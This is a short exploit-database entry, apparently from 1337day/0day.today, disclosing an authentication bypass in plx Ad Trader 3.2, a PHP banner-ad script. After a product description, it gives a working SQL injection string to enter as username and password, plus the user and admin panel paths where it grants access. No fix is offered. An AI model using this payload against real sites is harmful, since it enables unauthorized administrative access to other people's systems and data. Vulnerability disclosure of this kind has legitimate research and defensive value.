plx Ad Trader 3.2 Authentication Bypass Vulnerability

2010-12-21T00:00:00
ID 1337DAY-ID-15216
Type zdt
Reporter R4dc0re
Modified 2010-12-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Vendor or Software Link: http://www.plxwebdev.com/script/ad_trader/
# Category:WebApp
# Version: 3.2
# Price: 60 USD
# Contact: [email protected]
# Website: www.1337day.com
# Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337day members
###################################################################################################
 
Submit Your Exploit at [email protected]
 
###################################################################################################
[Product Details]
 
This script will allow you to sell Banner and/or Text Ads on your web site. Ads will be rotated on
different zones as you set them up in your admin area.
 
You will be able in admin area set as many ad packages you wish and as many zones as well.
Each zone represent an area on a page where ads are rotated. For every visit you receive to your
site a different ad will be shown.
 
Advertisers will signup for free and once they are inside their advertiser area
they can Buy as many ads they want. They will be able to manage all aspects of their campaign ads.
 
[Vulnerability]
 
Authentication Bypass:
 
Use This string ' or 1=1 or ''='' on username and password to Enter the User panel and the Admin panel
 
User panel:
http://server/plxadtrader/
Admin Panel:
http://server/plxadtrader/admin/
###################################################################################################



#  0day.today [2018-03-20]  #